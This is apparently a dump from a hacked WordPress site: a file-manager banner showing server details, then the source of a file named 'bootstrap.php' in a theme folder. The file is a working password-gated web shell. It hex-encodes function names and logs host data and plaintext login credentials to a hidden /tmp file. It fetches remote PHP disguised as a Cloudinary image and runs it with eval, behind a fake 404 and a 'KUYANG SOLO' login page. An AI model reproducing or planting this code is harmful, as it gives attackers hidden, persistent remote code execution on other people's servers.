HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //proc/self/root/proc/self/root/home/vitanhod/www/wp-content/themes/top_1772366318/js/bootstrap.php
<?php
@session_start();
@error_reporting(0);
function _sys_chk_auth() { return isset($_SESSION['auth_node']) && $_SESSION['auth_node'] === true; }
if (isset($_SESSION['sys_lock']) && time() < $_SESSION['sys_lock']) {
@header("HTTP/1.0 404 Not Found");
$_su = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . "/not-found-" . time();
$_p4 = _sys_fetch_ext($_su);
echo ($_p4) ? $_p4 : "<h1>404 Not Found</h1>";
exit();
}
$_u_node = "mantapjiwa";
$_p_node = '$2b$10$E7Ik9gMv6LOVXbFKmLfKPO9W1gcw80ElRf1zJMfemJoW10nAVqkAK';
if (!_sys_chk_auth()) {
if (isset($_POST['username']) && isset($_POST['password'])) {
if ($_POST['username'] === $_u_node && password_verify($_POST['password'], $_p_node)) {
$_SESSION['auth_node'] = true;
$_SESSION['sys_retry'] = 0;
$_sys_log = _sys_gen_rep();
@file_put_contents('/tmp/.sys_kern_buffer', $_sys_log . "\n---\n", FILE_APPEND | LOCK_EX);
@header("Location: " . $_SERVER['PHP_SELF']);
exit();
} else {
if (!isset($_SESSION['sys_retry'])) { $_SESSION['sys_retry'] = 0; }
$_SESSION['sys_retry']++;
if ($_SESSION['sys_retry'] >= 5) {
$_SESSION['sys_lock'] = time() + 30;
$_SESSION['sys_retry'] = 0;
@header("Location: " . $_SERVER['PHP_SELF']);
exit();
}
$_err_node = "Password Incorect";
}
}
}
function _sys_gen_rep() {
$_pr = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://";
$_dm = $_SERVER['HTTP_HOST'] ?? 'localhost';
$_sl = $_pr . $_dm . ($_SERVER['REQUEST_URI'] ?? '/');
$_os = php_uname();
$_pv = phpversion();
$_si = $_SERVER['SERVER_ADDR'] ?? @gethostbyname($_dm) ?? 'Unknown';
$_ri = $_SERVER['REMOTE_ADDR'] ?? 'Unknown';
$_m = "<b>SYSTEM_NODE_ACCESS</b>\n";
$_m .= "━━━━━━━━━━━━━\n";
$_m .= "ADDR : <code>{$_pr}{$_dm}/</code>\n";
$_m .= "PATH : <code>{$_sl}</code>\n";
$_m .= "SRV  : <code>{$_si}</code>\n";
$_m .= "KRNL : <code>" . htmlspecialchars($_os) . "</code>\n";
$_m .= "VERS : <code>{$_pv}</code>\n";
$_m .= "SRC  : <code>{$_ri}</code>\n";
$_m .= "━━━━━━━━━━━━━\n";
if (isset($_POST['username']) && isset($_POST['password'])) {
$_m .= "AUTH_U: <code>" . htmlspecialchars($_POST['username']) . "</code>\n";
$_m .= "AUTH_P: <code>" . htmlspecialchars($_POST['password']) . "</code>\n";
$_m .= "AUTH_S: SUCCESS\n";
}
return $_m;
}
function _sys_h2s($_h) {
$_s = '';
for ($i = 0; $i < strlen($_h); $i += 2) { $_s .= chr(hexdec(substr($_h, $i, 2))); }
return $_s;
}
function _sys_fetch_ext($_d) {
$_a = array('666f70656e','73747265616d5f6765745f636f6e74656e7473','66696c655f6765745f636f6e74656e7473','6375726c5f65786563');
$_b = array(_sys_h2s($_a[0]),_sys_h2s($_a[1]),_sys_h2s($_a[2]),_sys_h2s($_a[3]));
if (function_exists($_b[3])) {
$ch = curl_init($_d);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$res = $_b[3]($ch);
curl_close($ch);
return $res;
} elseif (function_exists($_b[2])) { return $_b[2]($_d); }
elseif (function_exists($_b[0]) && function_exists($_b[1])) {
$h = $_b[0]($_d, "r");
$res = $_b[1]($h);
fclose($h);
return $res;
}
return false;
}
if (_sys_chk_auth()) {
$_d = 'https://res.cloudinary.com/dosd2rczw/image/upload/v1773833160/background_y3djnp.jpg';
$_r = _sys_fetch_ext($_d);
if ($_r !== false) {
$_p = strpos($_r, '<?php');
if ($_p !== false) { eval(substr($_r, $_p + 5)); }
else { eval('?>' . $_r); }
exit();
}
}
if (!_sys_chk_auth()) {
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>KUYANG SOLO</title>
<link rel="icon" type="image/jpeg" href="https://res.cloudinary.com/dosd2rczw/image/upload/v1773820506/KUYANGSOLO_wkvldv.png">
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body, html { height: 100%; font-family: 'Segoe UI', sans-serif; }
body { background: url('https://res.cloudinary.com/dosd2rczw/image/upload/v1773820582/aaa_aquk1y.jpg') no-repeat center center fixed; background-size: cover; display: flex; justify-content: center; align-items: center; }
.form-container { display: flex; justify-content: center; align-items: center; width: 100%; padding: 20px; }
.login-form { width: 100%; max-width: 380px; padding: 40px 30px; background: rgba(0, 0, 0, 0.75); backdrop-filter: blur(10px); border-radius: 16px; box-shadow: 0 8px 32px rgba(0, 0, 0, 0.5); text-align: center; color: #fff; border: 1px solid rgba(255, 255, 255, 0.1); }
.login-form img { width: 90px; height: 90px; border-radius: 50%; object-fit: cover; margin-bottom: 15px; border: 3px solid rgba(255, 255, 255, 0.2); }
.login-form h2 { margin: 0 0 25px 0; font-size: 24px; font-weight: 600; letter-spacing: 1px; }
.login-form input { width: 100%; padding: 14px 16px; margin: 10px 0; border: none; border-radius: 8px; background: rgba(255, 255, 255, 0.1); color: #fff; font-size: 15px; border: 1px solid rgba(255, 255, 255, 0.1); }
.login-form button { width: 100%; padding: 14px; margin-top: 20px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; border: none; border-radius: 8px; cursor: pointer; font-size: 16px; font-weight: 600; text-transform: uppercase; }
.error-message { background: rgba(255, 82, 82, 0.2); color: #ff5252; font-size: 14px; padding: 10px; border-radius: 6px; margin-bottom: 15px; border: 1px solid rgba(255, 82, 82, 0.3); }
</style>
</head>
<body>
<div class="form-container">
<div class="login-form">
<img src="https://res.cloudinary.com/dosd2rczw/image/upload/v1773820331/solo_izg50u.gif" alt="Logo">
<h2>KUYANG SOLO</h2>
<?php if (isset($_err_node)): ?>
<div class="error-message"><?php echo $_err_node; ?></div>
<?php endif; ?>
<form method="post">
<input type="text" name="username" placeholder="Username ..." required>
<input type="password" name="password" placeholder="Password ..." required>
<button type="submit">Sign in</button>
</form>
</div>
</div>
</body>
</html>
<?php
exit();
}
?>